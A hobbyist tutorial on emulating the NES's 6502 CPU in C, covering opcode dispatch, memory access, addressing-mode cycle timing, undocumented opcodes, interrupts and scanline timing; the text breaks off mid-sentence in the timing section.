++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++Implementing Opcodes++++++++++++++++++++++++++++++ Emulating the CPU can be made very simple due to the fact that all memory accesses in the NES is done in bytes, so you do not have to worry about issues like endian unless you wanted to implement some optimizations. Opcodes are the machine code instruction that does some math calculation or conditional branching, it is just the number equivalent of 6502 assembly. Example: LDA $#10 will be 0xA9 0x10 when read inside the PRG-ROM. There are 2 main ways to implementing the opcodes for the NES, one is a big switch block and one is function pointers. ========================================================================== Example: cpu.opcode = mem_read(cpu.pc++); switch (cpu.opcode) { case opcode: //do stuff break; } or decode[mem_read(cpu.pc++)](); ========================================================================== I recommend using the switch since it saves the overhead of function jumps and since the opcodes are in linear length, [0, 0xFF], a good compiler can transform the switch statement into a jump table for efficient branching. A switch statement also has the abilities of using gotos to save multiple cases, saving a few more function calls or redundant code when using function pointers. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++Splitting up flags+++++++++++++++++++++++++++++++ It is a good idea to split up the status flag register into something like fi, fz, fc, fn, and fb. Most opcodes set some form of status in the flag, so splitting them up save bitwise operations you have to perform. ======================================================================== Example: //LDA_IM using status flag cpu.a = mem_read(cpu.pc++); status_flg = (status_flg & ~(n_flag | z_flag)) | (cpu.a & n_flag) | (!cpu.a << 1); //LDA_IM using split flags cpu.a = mem_read(cpu.pc++); cpu.fz = cpu.fn = cpu.a; //we can decode this //when needed ========================================================================= With split flags we can just set equal to the register. Since most opcodes set status bits, it is faster to figure it out when the branching opcode takes place,instead of doing it with every opcode that sets the status bit. There are some opcodes that requires all the separate flag byte to be combined into one byte, such as PHP which pushes the status flag onto the stack and PLP which pulls the status flag off of the stack. The BRK instruction, NMI, and IRQ also pushes the status flag onto the stack to save the state before jumping to the handler. To handle this, you can make a function that OR everything together when the flags needs to be combined and split the flag up on when the flags need to be split back into normal. This is still faster than using one byte status flag, due to PHP, PLP, NMI, BRK, and IRQ is not used as much as all the other opcodes that sets the status flags. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++Memory Access++++++++++++++++++++++++++++++++++++++ For memory access, blargg ran a few heuristic tests and found the hybrid solution of using if/else along with function pointers to work the best. Most games access the RAM portion of the code, implementing this in a top portion if condition is faster than using a function pointer. ========================================================================== Example (blargg's method): u8 mem_read(u16 addr) { /* focus on optimizing the RAM, because we assume that the RAM is accessed much more than any other addresses, it is recommended one do their own test and pick memory area they want to optimize most */ if (addr < 0x800) return ram[addr]; //save an AND 0x7FF /* make another function so this function be small enough so it has a better chance to be in the cache */ else return mem_read_other(addr); } u8 mem_read_other(u16 addr) { /* assume that the developers know that 0x800 to 0x2000 are just mirrors of 0 to 0x7FF and won't use it as much */ if (addr < 0x2000) return ram[addr & 0x7FF]; else if (addr <= 0x3FFF) return ppu_read(addr); else if (addr >= 0x4000 && addr <= 0x4017) return apu_read(addr); else return mem_read_fp[addr >> 12](addr); } ========================================================================== The same idea for memory access could be implemented for write functions. You could use function pointers gain a little speed. The PPU, APU, and RAM have well defined addresses, but outside of that, the cartridge defines the addresses beyond 0x4017, so function pointers would be the best way to handle such diversity. You can set the function pointers in your mapper init function to point to the correct handler. For ppu_read and apu_read, it is best if one use a switch since the addresses are also in linear order, so a jump table can be made efficiently. There is also the route of using full function pointers for the memory accesses, while this is a little bit slower, this has the advantage when it comes to debugging, one can have a debug flag in their code and when turned on, the memory access can switch to their debugging counterparts. ========================================================================== Example: mem_read_fp[0] = read_ram; mem_read_fp[1] = read_ram; .... mem_read_fp[15] = read_prg_hi; u8 mem_read(u16 addr) { return mem_read_fp[addr >> 12](addr); } ========================================================================== While the program counter can be in any address mapping, [0, 0xFFFF], it mainly executes code inside [0x8000, 0xFFFF] (The ROM space), using the if/else form of mem_read is not as efficient as the function pointer form for getting opcodes and its operands. It is recommended you use the function pointer form of mem_read, and use the if/else form of mem_read for memory accesses to the RAM and low addresses. When using the function pointers to get opcodes, it is a good idea to introduce another memory location, mem_read_fp[16] to point to read_ram. This is so the mem_read() in function pointer form can handle access overflows without resorting to running AND on all of the operand get instructions. ========================================================================== Example: cpu.pc = 0xFFFF; cpu.opcode = mem_read((cpu.pc + 1) & 0xFFFF) cpu.pc = (cpu.pc + 1) & 0xFFFF; /* handling 0xFFFF overflow case */ ========================================================================== ========================================================================== Example: /* now if cpu.pc was 0xFFFE */ cpu.opcode = mem_read((cpu.pc + 1) & 0xFFFF); cpu.pc = (cpu.pc + 1) & 0xFFFF; /* is now 0xFFFF */ switch (cpu.opcode) { /* Now all the memory operand is going to be in the range of 0x10000 and above, one would have to AND with all the operands */ case opcode: operand = (cpu.pc + 1) & 0xFFFF; /* do stuff */ break; } ========================================================================== With assigning another function pointer to to address lines 0x10000, 0x10FFF), you can just AND the cpu.pc with 0xFFFF everytime, instead of all the operands. ========================================================================== Example: /* with mem_read_fp[16] assigned to read_ram */ cpu.opcode = mem_read(cpu.pc++); cpu.pc &= 0xFFFF; switch (cpu.opcode) { case opcode: operand = mem_read(cpu.pc++); /* get operand */ /* do stuff */ break; } ========================================================================== As shown, the giving the line mem_read_fp[16] allows us to deal with the overflow issue in one case of code, saving redundant code, and is faster. A faster, but not as portable way to deal with this is to have cpu.pc as a unsigned short, if we assuming the sizeof(short) to be 2 bytes and CHAR_BITS to be 8, it will handle the overflow issue for us by wrapping around when cpu.pc reaches 0x10000, but if we want our code to be portable, this method won't work as well as giving mem_read_fp another pointer location. With the limited NES memory mapping for the PRG-ROM, many game cartridges allow these ROMs to be bankswitch, that is, replace the data in addresses [0x8000, 0xBFFF] or [0xC000, 0xFFFF] with something different when a writing to a register takes a place. One can handle this with using pointers, having cpu.prg_bank[0] point to a PRG_ROM bank, and having cpu.prg_bank[1] point to another PRG_ROM bank, and to switch you can just assign the pointers to a different memory location. This implies that cpu.prg_bank[0] and cpu.prg_bank[1] points to 0x4000 of data, now some cartridges can switch in a smaller size of memory data, so introducing several more prg_bank pointers that can point to a smaller fragment of memory, such as 0x2000 chunks of data, and then have reassign the PRG-ROM function pointers to a function that properly read such data chunks. Game cartridges also sometimes write to memory location or tries to switch banks that doesn't seem to exist. ========================================================================== Example: void mapper_write_handle(u16 addr, u8 data) { /* let say that there are 4 prg banks in the rom file and data is 10 */ switch (addr & 0xF000) { case 0x8000: /* switch 0x4000 chunks of data at 0x8000 */ cpu.prg_bank[0] = &prg_rom[0x4000*data]; /* out of bounds */ break; } } ========================================================================== The reasoning to this is how the hardware handles such a transaction, it can either ignore the write if it is too big, or it wraps around (data % prg_size). Consult the mappers documentation to decide if you should ignore something like this in a specific mapper or handle it. If it is a mapper that is not documented, the only way is through is trial and error. The MOS 6502 opcodes can be categorized by their memory access, such as zero page addressing, absolute, indirect, etc. In fact, the bulk of the opcodes inside the CPU are the same, such as there are 8 opcodes of ADC (add with carry) or 9 opcodes of SBC (subtract with carry), the only thing that differs is how where the memory access, where it writes to, and how long it takes. Abstracting these inside functions allow much saving of redundant code. =========================================================================== Example: switch (cpu.opcode) { case lda_imm: get_imm(); goto lda; case lda_zp: get_zp(): goto lda; case adc_imm: get_imm(); goto adc; lda: /* do stuff */ break; adc: /* do stuff */ break; } ============================================ Abstracting the memory access operations also helps simplify timing that is covered later, since a MOS 6502 clocks cycles by a memory read/write. For a write or read, one cycle is clocked. +++++++++++++++++++++++Useful CPU tidbits+++++++++++++++++++++++++++++++++ Here are the all the memory accesses used by opcodes rd and wr are just abstracted mem_read() and mem_write(), *_rmw() access is read/write/modify, *_w() is for instructions that write, and *_r() is for instruction that reads the behavior is documented in the code. I wanted to include this because there are some unclear things such as if zero page wraps around or what happens if indirect y access beyond 0xFFFF mark. So here it is. There are instructions that does a read without assigning it to other variables. The reason for this is that rd and wr is abstracted to handle timing covered later, there are also memory mapped registers, that their behavior is affected by a read, thus we need to put it in there to handle such behaviors. For more information on why there are such reads and writes, refer to http://www.viceteam.org/plain/64doc.txt which covers extensive amount of cycle by cycle information for opcodes. To sum it up, though, the reason for the extra read because of page crossing, sometimes the PC high byte is off due to the quirk in the hardware, and since the processor cannot undo a write to an invalid address, it reads from the address first, then write, this is why you see extra reads in memory write code. ==================Memory Access=========================================== 1 read or write means 1 CPU cycle. PC is the program counter. Some behavior in the code does not match what is explained, but this is just due to how the memory fetching cannot affect any other units, since the NES is a single CPU, the order of operation in the opcodes doesn't matter to much as long as the cycle count is achieved. The only thing that matters is the operation part, where it does the operation to the opcode. imp() is implied mode, it is for opcodes that does not load a value or write to from memory, but instead sets a flag, transfer variables, or push things onto the stack, etc. 1. Fetch opcode from the current PC address, and then increment the PC. 2. Read the next instruction byte, but doesn't do anything to it, and then do operation on it. 2 cycles //Implied/Immediate modes void imp() { rd(cpu.pc); } imm() is immediate mode, this is 2 cycles, where it fetches the next place in the program counter getting the operand for the opcode to act on, this is for things such as adding/subtracting constants, loading values, etc. 1. Fetch opcode from the current PC address, and then increment the PC. 2. Fetch the operand from next byte in PC, increment the PC, and do operation using the value fetched. 2 cycles void imm() { cpu.tmp = rd(cpu.pc++); } zp_r() is zero page read mode. It is for opcodes that read from zero page, to get the value and do operation on it, such as zero page ADC, SBC, LDA, CMP, etc. The address range is [0, 0xFF], thus saving one cycle for getting the hi byte of the PC. 1. Fetch opcode from the current PC address, and then increment the PC. 2. Fetch the operand from the next byte in the PC, and then increment the PC. 3. Fetch the value stored in the address which is the operand value, and do operation using the value fetched from the address. 3 cycles //Read modes void zp_r() { cpu.addr = rd(cpu.pc++); cpu.tmp = rd(cpu.addr); } zpx_r() is zero page indexed addressing. It is the same as zp_r(), but it adds the operand address with the X register value to get the address needed. 1. Fetch opcode from the current PC address, and then increment the PC. 2. Fetch the operand from the next byte in the PC, and then increment the PC. 3. Read from the address, and then add the X register to the address, it wraps around to 0 if address + X > 0xFF, as it does not handle page crossing. 4. Fetch the value at the address, and then do operation on it. 4 cycles void zpx_r() { cpu.addr = rd(cpu.pc++); rd(cpu.addr); cpu.addr = (cpu.addr + cpu.x) & 0xFF; cpu.tmp = rd(cpu.addr); } zpy_r() is zero page indexed addressing. It is the same as zp_r(), but it adds the operand address with the Y register value to get the address needed. 1. Fetch opcode from the current PC address, and then increment the PC. 2. Fetch the operand from the next byte in the PC, and then increment the PC. 3. Read from the address, and then add the Y register to the address, it wraps around to 0 if address + X > 0xFF, as it does not handle page crossing. 4. Fetch the value at the address, and then do operation on it. 4 cycles void zpy_r() { cpu.addr = rd(cpu.pc++); rd(cpu.addr); cpu.addr = (cpu.addr + cpu.y) & 0xFF; cpu.tmp = rd(cpu.addr); } abs_r() is absolute addressing, the range is [0, 0xFFFF], covering the entire memory of the CPU memory map. 1. Fetch opcode from the current PC address, and then increment the PC. 2. Fetch low byte of the address from the next byte in current PC, and then increment the PC. 3. Fetch hi byte of the address from the next byte in current PC, and then increment the PC. 4. Fetch value from data, and then do operation on it. void abs_r() { cpu.addr = rd(cpu.pc++); cpu.addr |= rd(cpu.pc++) << 8; cpu.tmp = rd(cpu.addr); } absx_r() works the same way as abs_r() except it adds the X register to the address for the value it gets (absolute indexed addressing). If address + X page crosses however, (a page is 256 bytes in size, so 0, 0xFF is 0 page, 0x100, 0x1FF is the first page, so on...) then it takes another cycle to fix it (This is due to the hardware getting a wrong value for the hi byte), then it fetch the value as normal. 1. Fetch opcode from the current PC address, and then increment the PC. 2. Fetch low byte of the address from the next byte in current PC, and then increment the PC. 3. Fetch hi byte of the address from the next byte in current PC, increment the PC, and then add the X register to the address. 4. If there was no page crossing, skip this step, if there was, read from the address, and fix the hi byte (don't need to do anything to fix the hi byte in software.) 5. Read from the new fixed address. 4 cycles if no page crossing, 5 if there is. void absx_r() { cpu.addr = rd(cpu.pc++); cpu.addr |= rd(cpu.pc++) << 8; cpu._addr = (cpu.addr & 0x100); cpu.addr += cpu.x; if ((cpu.addr & 0x100) ^ cpu._addr) rd(cpu.addr); cpu.tmp = rd(cpu.addr); } absy_r() works the same way as abs_r() except it adds the Y register to the address for the value it gets (absolute indexed addressing). If address + Y page crosses however, (a page is 256 bytes in size, so 0, 0xFF is 0 page, 0x100, 0x1FF is the first page, so on...) then it takes another cycle to fix it (This is due to the hardware getting a wrong value for the hi byte), then it fetch the value as normal. 1. Fetch opcode from the current PC address, and then increment the PC. 2. Fetch low byte of the address from the next byte in current PC, and then increment the PC. 3. Fetch hi byte of the address from the next byte in current PC, increment the PC, and then add the Y register to the address. 4. If there was no page crossing, skip this step, if there was, read from the address, and fix the hi byte (don't need to do anything to fix the hi byte in software.) 5. Read from the new fixed address. 4 cycles if no page crossing, 5 if there is. void absy_r() { cpu.addr = rd(cpu.pc++); cpu.addr |= rd(cpu.pc++) << 8; cpu._addr = (cpu.addr & 0x100); cpu.addr += cpu.y; if ((cpu.addr & 0x100) ^ cpu._addr) rd(cpu.addr); cpu.tmp = rd(cpu.addr); } The indx_r() is an addressing mode that is like pointers in C, where it fetches a value that is used as a pointer that points to the real address, then it gets the real address from it, and then do operation on it. 1. Fetch the opcode from the current address in PC. 2. Fetch the pointer address from the next byte in the PC, increment PC. 3. Read from the address, and then add X to it, since this address is in 0 page, the wrap around that affects zero page applies here for page crossing. 4. Using the pointer value, dereference it to get the low byte value. 5. Then (pointer + 1) contains the hi byte of the address, use that to get the hi byte of the address 6. Fetch the value from it, and then do the operation on it. 6 cycles void indx_r() { cpu.addr = rd(cpu.pc++); rd(cpu.addr); cpu.tmp = (cpu.addr + cpu.x) & 0xFF; cpu.addr = rd(cpu.tmp); cpu.addr |= rd((cpu.tmp + 1) & 0xFF) << 8; cpu.tmp = rd(cpu.addr); } The indy_r() is like the indx_r(), except that instead of adding the pointer value with the register to get the actual address, it gets the actual address first, and then it adds the Y register to the address to get the value. It is used to implement pointers to array type structure. 1. Fetch the opcode from the current address in PC. 2. Fetch the pointer address from the next byte in the PC, increment PC. 3. Fetch the low byte of the address from the pointer value. 4. Fetch the hi byte of the address from the pointer value + 1, page crossing wraps around works the same way they do in zero page, and then add y to the low byte of the address. 5. If there was no page crossing skip this step, if there was, execute another cycle due to the hardware needing to fix the hi byte of the address during this time. 6. Fetch the value at the address. 5 cycles if no page crossing, 6 if there was. void indy_r() { cpu._addr = rd(cpu.pc++); cpu.addr = rd(cpu._addr); cpu.addr |= (rd((cpu._addr+1) & 0xFF) << 8); cpu._addr = cpu.addr & 0x100; cpu.addr += cpu.y; if ((cpu.addr & 0x100) != cpu._addr) rd(cpu.addr); cpu.tmp = rd(cpu.addr); } //Write modes The write modes work exactly the same way as the read modes, except it does not read the value specified, it gets the operands first, and then it uses that value to do the operation on it, then it writes to it later, which takes 1 extra cycle not shown in these code, since it needs to do the operation using the operand first. void zp_w() { cpu.addr = rd(cpu.pc++); } void zpx_w() { cpu.addr = rd(cpu.pc++); rd(cpu.addr); cpu.addr = (cpu.addr + cpu.x) & 0xFF; } void zpy_w() { cpu.addr = rd(cpu.pc++); rd(cpu.addr); cpu.addr = (cpu.addr + cpu.y) & 0xFF; } void abs_w() { cpu.addr = rd(cpu.pc++); cpu.addr |= rd(cpu.pc++) << 8; } void absx_w() { cpu.addr = rd(cpu.pc++); cpu.addr |= rd(cpu.pc++) << 8; cpu.addr += cpu.x; rd(cpu.addr); } void absy_w() { cpu.addr = rd(cpu.pc++); cpu.addr |= rd(cpu.pc++) << 8; cpu.addr += cpu.y; rd(cpu.addr); } void indx_w() { cpu._addr = rd(cpu.pc++); rd(cpu._addr); cpu._addr = (cpu._addr + cpu.x) & 0xFF; cpu.addr = rd(cpu._addr); cpu.addr |= (rd((cpu._addr + 1) & 0xFF) << 8); } void indy_w() { cpu._addr = rd(cpu.pc++); cpu.addr = rd(cpu._addr); cpu.addr |= (rd((cpu._addr + 1) & 0xFF) << 8); cpu.addr += cpu.y; rd(cpu.addr); } //read modify write mode The read modify write mode is a combination of read and write, it is for opcodes such as DEC or INC, ROR, ROL, etc. So basically, these modes fetches the opcode, and operands, and then get the value at the address, write back the value that was just read, and then do the operation on it, then finally writing to the address with the new value. void zp_rmw() { zp_r(); rd(cpu.addr); } void zpx_rmw() { zpx_r(); wr(cpu.addr, cpu.tmp); } void abs_rmw() { abs_r(); wr(cpu.addr, cpu.tmp); } void absx_rmw() { cpu.addr = rd(cpu.pc++); cpu.addr |= rd(cpu.pc++) << 8; cpu.addr += cpu.x; rd(cpu.addr); cpu.tmp = rd(cpu.addr); wr(cpu.addr, cpu.tmp); } void absy_rmw() { cpu.addr = rd(cpu.pc++); cpu.addr |= rd(cpu.pc++) << 8; cpu.addr += cpu.y; rd(cpu.addr); cpu.tmp = rd(cpu.addr); wr(cpu.addr, cpu.tmp); } void indx_rmw() { indx_r(); wr(cpu.addr, cpu.tmp); } void indy_rmw() { indy_w(); cpu.tmp = rd(cpu.addr); wr(cpu.addr, cpu.tmp); } void rmw_w() { wr(cpu.addr, cpu.tmp); } =====================Obscure Behavior of opcodes========================== Here are some opcode beahaviors that is while documented, takes some effort to find, so I decided to list them here. cpu.fv = overflow flag cpu.fn = sign flag cpu.fc = carry flag cpu.a = accumulator cpu.x = x register The behavior for ADC and SBC: void adc() { cpu._addr = cpu.a + cpu.tmp + cpu.fc; //overflow is basically negative + negative = positive //postive + positive = negative cpu.fv = (cpu._addr ^ cpu.a) & (cpu._addr ^ cpu.tmp) & 0x80; cpu.fc = (cpu._addr & 0x100) >> 8; cpu.fz = cpu.fn = cpu.a = cpu._addr & 0xFF; } void sbc() { cpu._addr = cpu.a - cpu.tmp - !cpu.fc; cpu.fv = (cpu.a ^ cpu.tmp) & (cpu.a ^ cpu._addr) & 0x80; cpu.fc = !(cpu._addr & 0x100); cpu.fz = cpu.fn = cpu.a = cpu._addr & 0xFF; } Here is the behavior of page crossing on branching instruction cpu._tmp = (s8) rd(cpu.pc++); if (cond) { cpu.addr = (cpu.pc & 0x100); rd(cpu.pc); cpu.pc += cpu._tmp; //bvc doesnt need to page crossing check //it always take 3 cycles no matter where it is if (cpu.addr ^ (cpu.pc & 0x100)) rd(cpu.pc); } A quirk of the BRK instruction void brk() { rd(cpu.pc++); push(cpu.pc >> 8); push(cpu.pc & 0xFF); cpu.fb = 1; join_flgs(); push(cpu.p); cpu.fi = 1; /* if nmi pending gets set during 4th * cycle brk gets masked by nmi but brk * flag will still be pushed * documented in 64doc.txt * and found in nintendulator emulator src code * thanks for the accurate behavior */ if (cpu.nmi) //the quirk { cpu.nmi = 0; cpu.pc = rd(0xFFFA); cpu.pc |= (rd(0xFFFB) << 8); } else { cpu.pc = rd(0xFFFE); cpu.pc |= (rd(0xFFFF) << 8); } } ========================================================================== ================Unofficial Opcodes======================================== There is some differing behavior for the same undocumented opcodes in the docs, I used blargg's cpu test and managed to get most of the undocumented opcode tests to pass, I'll list the behavior here, they are not all correct, but I'll also list them here, with a note. (failed 3 tests in blargg's cpu test, 2 were said to be faulty by blargg himself). Also, many undocumented opcodes are a combination of nearly space opcodes, such as SAX is a combination of AND + STA. The reason for this had to do with how the 6502 decode instructions. For more information, consult http://www.pagetable.com/?p=39. Most games do not use undocumented opcodes, but there are some that do, its a good idea to implement these opcodes. void anc() { //not quite sure what this opcode is called //opcode 0x0B and 0x2B (they're the same supposedly) imm(); _and(); cpu.fc = (cpu.fn & 0x80) >> 7; } void asr() { //AND + LSR //opcode is 0x4B imm(); _and(); //AND lsr(cpu.a); //LSR } void arr() { //one of the opcode that fails, //but this behavior is given by blargg //memory access //imm(); // opcode 0x6B cpu.a = (cpu.a & cpu.tmp) >> 1; if (!cpu.fz) cpu.fz = 1; else if (!cpu.a) cpu.fz = 0; cpu.fn = cpu.a; cpu.fc = cpu.fv = 0; switch (cpu.a & 0x60) { case 0x00: break; case 0x20: cpu.fv = 1; break; case 0x40: cpu.fv = 1; cpu.fc = 1; break; case 0x60: cpu.fc = 1; break; } } void asx() { //some call it SAX //opcode is 0xCB //SBC without carry imm(); cpu._addr = (cpu.a & cpu.x) - cpu.tmp; cpu.fz = cpu.fn = cpu.x = cpu._addr & 0xFF; cpu.fc = !(cpu._addr & 0x100); } void atx() { //atx (lxa) and + tax //opcode 0xAB imm(); cpu.a |= 0xFF; _and(); cpu.x = cpu.a; //the OR cpu.a |= 0xFF //constant is different on different MOSes. //here is a possible explanation from tepples, a nesdev //member. Thanks to hap and tepples for talking about the behavior. /* Hap: I was able to fix ATX by ORing A with $FF, according to documents it's ORed with $EE, $EF, $FE, or $FF depending on CPU internal state like the program counter. Tepples: $EF in particular looks like the mask for a carry coming out of the lower nibble, as might be seen in hardware handling packed binary-coded decimal, such as the original 6502 CPU manufactured by MOS Technology. Hap: Maybe on the NES it's always ORed with $FF, at least it makes your test program a bit happier on my emu. Tepples: This might be the case for the NES, which for patent reasons uses a cut-down 6502 core lacking decimal mode.*/ } void axa() { //absy_w() is 0x9F; //indy_w() is 0x93; wr(cpu.addr, cpu.x & cpu.a & 7); } void dcp() { //DEC + CMP //zp_rmw() is opcode 0xC7 //zpx_rmw() is opcode 0xD7 //abs_rmw() is opcode 0xCF //absx_rmw() is opcode 0xDF //absy_rmw() is opcode 0xDB //indx_rmw() is opcode 0xC3 //indy_rmw() is opcode 0xD3 decr(cpu.tmp); //DEC comp(cpu.a); //CMP A rmw_w(); } void hlt() { //some call it KIL //halt the CPU, reset needed to continue //operation /* opcode 0x02, 0x12, 0x22, 0x32, 0x42, 0x52, 0x62, 0x72, 0x92, 0xB2, 0xD2, 0xF2 */ } void isb() { //also called ISC in some docs, INC + SBC //zp_rmw() is opcode 0xE7 //zpx_rmw() is opcode 0xF7 //abs_rmw() is opcode 0xEF //absx_rmw() is opcode 0xFF //absy_rmw() is opcode 0xFB //indx_rmw() is opcode 0xE3 //indy_rmw() is opcode 0xF3 incr(cpu.tmp); //INC sbc(); //SBC rmw_w(); } void lar() { //some call it LAE or LAS //opcode is 0xBB absy_r(); cpu.a = cpu.x = cpu.s = cpu.tmp & cpu.s; } void lax() { //LDA + LDX //zp_r() is opcode 0xA7 //zpy_r() is opcode 0xB7 //abs_r() is opcode 0xAF //absy_r() is opcode 0xBF //indx_r() is opcode 0xA3 //indy_r() is opcode 0xB3 cpu.fz = cpu.fn = cpu.a = cpu.x = cpu.tmp; } void nop_undocumented() { switch (cpu.opcode) { case 0x80: case 0x82: case 0x89: case 0xC2: case 0xE2: //nop_im imm(); break; case 0x04: case 0x44: case 0x64: //nop_zp zp_r(); break; case 0x14: case 0x34: case 0x54: case 0x74: case 0xD4: case 0xF4: //nop_zpx zpx_r(); break; case 0x0C: //nop_abs abs_r(); break; case 0x1C: case 0x3C: case 0x5C: case 0x7C: case 0xDC: case 0xFC: //nop_absx absx_r(); break; } } void rla() { //ROL + AND //zp_rmw() is opcode 0x27 //zpx_rmw() is opcode 0x37 //abs_rmw() is opcode 0x2F //absx_rmw() is opcode 0x3F //absy_rmw() is opcode 0x3B //indx_rmw() is opcode 0x23 //indy_rmw() is opcode 0x33 rol(cpu.tmp); //ROL _and(); //AND rmw_w(); } void rra() { //ROR + ADC //zp_rmw() is opcode 0x67 //zpx_rmw() is opcode 0x77 //abs_rmw() is opcode 0x6F //absx_rmw() is opcode 0x7F //absy_rmw() is opcode 0x7B //indx_rmw() is opcode 0x63 //indy_rmw() is opcode 0x73 ror(cpu.tmp); //ROR adc(); //ADC rmw_w(); } void sax() { //AND + STA some docs call this asx but asx is used //by another opcode, nestest.nes uses this as asx //zp_w() is opcode 0x87 //zpy_w() is opcode 0x97 //abs_w() is opcode 0x8F //indx_w() is opcode 0x83 mem_write(cpu.addr, cpu.a & cpu.x); } void sbc_undocumented() { //this is exactly the same as 0xe9 (sbc immediate) //opcode. //opcode is 0xEB imm(); sbc(); } void slo() { //ASL + ORA //zp_rmw() is opcode 0x07 //zpx_rmw() is opcode 0x17 //abs_rmw() is opcode 0x0F //absx_rmw() is opcode 0x1F //absy_rmw() is opcode 0x1B //indx_rmw() is opcode 0x03 //indy_rmw() is opcode 0x13 asl(cpu.tmp); //ASL _ora(); //ORA rmw_w(); } void sre() { //LSR + EOR //zp_rmw() is opcode 0x47 //zpx_rmw() is opcode 0x57 //abs_rmw() is opcode 0x4F //absx_rmw() is opcode 0x5F //absy_rmw() is opcode 0x5B //indx_rmw() is opcode 0x43 //indy_rmw() is opcode 0x53 lsr(cpu.tmp); //LSR _eor(); //EOR rmw_w(); } void sxa() { //one of the opcode that fails, blargg //says its one of the faulty ones, never //seen a game that uses it, though. //some call it SHX or XAS //opcode 0x9E absx_w(); wr(cpu.addr, cpu.fz = cpu.fn = (cpu.y & ((cpu.addr - cpu.x) >> 8)) + 1); } void sya() { //one of the opcode that fails, blargg //says its one of the faulty ones, never //seen a game that uses it, though. //some call it SHY or SAY //opcode 0x9C absx_w(); wr(cpu.addr, cpu.fz = cpu.fn = (cpu.y & ((cpu.addr - cpu.x) >> 8)) + 1); } void xaa() { //some call it ANE //opcode is 0x8B imm(); cpu.fn = cpu.fz = cpu.a = cpu.x & cpu.tmp; } ========================================================================== =======================NMI/IRQ behavior=================================== NMI is known as non-maskable interrupt, and it is triggered by the PPU when it finishes drawing everything, and enters vertical blank, the time when the drawing gun in the TV re-positions itself. While it is called a "non-maskable" interrupt, in that no CPU operation can prevent it from happening, you can mask it by writing 0 to the 7th bit to the memory mapped register 0x2000 (PPUCTRL). IRQ is an interrupt request that can be generated by the APU or the game hardware cartridge. There are multiple subunits inside the APU that can trigger an IRQ, all it takes is one subunit to fire an IRQ for it to happen. IRQs are continuously asserted, that is, unlike NMI, when the IRQ handler jumps to the IRQ code, it does not clear the flag that tells the CPU that it doesn't need to assert anymore. Shown above in the handle_nmi and handle_irq code, cpu.nmi gets cleared at the end, while cpu.irq does not, it just gets masked by cpu.fi (interrupt flag on, no jump to interrupts) be set to true, as soon as the you exit the handler using RTI, or clearing the interrupt flag, the CPU will see another IRQ pending and will rejump again. It is up to the programmer of the game to clear IRQs or mask it, not the NES. As for NMI, this is handle automatically for you. The frame counter and the DMC channel are the 2 ways the APU can trigger an NMI. These 2 will be covered more in detail in the relevant section (PPU for NMI), (APU for IRQs). =======Triggering IRQ example============================================= #define DMC_IRQ 1 #define FRAME_CNT 2 void dmc_run() { //something triggers IRQ... cpu.irq |= DMC_IRQ; } void frame_cnt_run() { //something that triggers IRQ... cpu.irq |= FRAME_CNT_IRQ; } //same goes for mapper cartridge IRQs void cpu_run() { ...code if (cpu.irq) //Only one unit need to fire IRQ for it to happen handle_irq(); } ========================================================================= =======How to handle NMI/IRQ============================================= Here is the code that shows an example of what the handler does when jumping to IRQ or NMI. The NMI has a higher priority than the IRQ so let say if both NMI and IRQ are triggering NMI will go first. void cpu_run() { //opcodes run first... if (cpu.nmi) handle_nmi(); else if (cpu.irq) handle_irq(); } void handle_nmi() { //fetch op, read next op and throw away rd(cpu.pc); rd(cpu.pc); cpu.fb = 0; push( cpu.pc >> 8); push( cpu.pc & 0xFF); join_flgs(); push(cpu.p); cpu.fi = 1; cpu.pc = rd(0xFFFA); cpu.pc |= (rd(0xFFFB) << 8); cpu.nmi = 0; } void handle_irq() { rd(cpu.pc); rd(cpu.pc); push(cpu.pc >> 8); push(cpu.pc & 0xFF); cpu.fb = 0; join_flgs(); push(cpu.p); cpu.fi = 1; cpu.pc = rd(0xFFFE); cpu.pc |= (rd(0xFFFF) << 8); } ========================================================================= ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++Timing+++++++++++++++++++++++++++++++++++++++ Timing is one of the most important things that determines a good emulator. It decides whether or not the emulator is slow or not, and decides maintainability and optimizations that can be done. I will cover a couple methods of timing, to give the reader a overview of how one can do timing. =================Example================================================== int cpu_run(int cycles) { /* for anything that is going to be running alot and inside a loop, using local vars is faster */ int cycles_remain = cycles; while (cycles_remain > 0) { cpu.opcode = mem_read(cpu.pc++); switch (cpu.opcode) { case opcode: //do stuff cycles_remain -= num_cycles; //using a table can help manage this //cycles_remain -= cyc_table[opcode]; break; } } return cycles_remain; } ========================================================================== The first method used to be the most popular, and one of the fastest. The idea behind this method is to run X amount of CPU cycles, which makes around 1 scanline drawn of the PPU (113 + 2/3 cycles for the NTSC PPU, 106 + 9/16 cycles for the PAL), We could have sub resolution of a cycle, though if we tried to, there are no benefits and major speed backs, therefore we do around at most the integral number the cycles, 114 for the CPU, 107 for the PAL. and leaving some left over cycles which we add to the next run. ======Example for the above code========================================== int timing_table[2][16] = { { 114, 114, 113 }, { 106, 107, 106, 107, 106, 107, 106, 107, 107, 106, 107, 106, 107, 106, 107, 107 } }; void nes_run() { int c = 0; int left = 0; while (run) { left = cpu_run(timing_table[region][c++ % region_wrap] + left); ppu_run_scanline(); apu_run_scanline(); mapper_run_scanline(); //handle interrupts/whatever here } } The table is a way of trying to preserve the the resolution of the PPU and CPU timing, though the left overs disturb the preservation. As you can see, that the main unit that we cater to is the PPU, the APU follows, along with the cartridge extra hardware. This was the way emulators were written back then, when the timing information for the PPU wasn't simply available. Why scanline and not a whole frame, one might ask, because there were some games that write to the end of the scanline when H-BLANK is occuring that can change the scrolling to the PPU, and thus output in a differently. This method is called the "scanline method". A more accurate method of this way is to use the PPU resolution (NTSC PPU is 3 times faster than the CPU, 3.2 for the PAL), and use the resolution of 15 = 1 cpu cycle for the NTSC CPU, and 16 for the PAL CPU. The reason for this is to maintain the ratio of 3 and 3.2 for the NES. With this method, we use the PPU cycle count as 5 = 1 cycle, to achieve the ratio. (5/15 and 5/16 (add this 5 times) for one full cycle.) For every CPU cycle we add 15 for NTSC, 16 for PAL, and when it is time to run the PPU we add 5 to each cycle that the PPU is ran. Along the way, we can deal with cases where the CPU is affecting the behavior of the PPU or the APU by having a queue of events, and when the PPU or APU is ran, it can check the queue of when that event occured at what CPU time, and act accordingly. As for the PPU raising 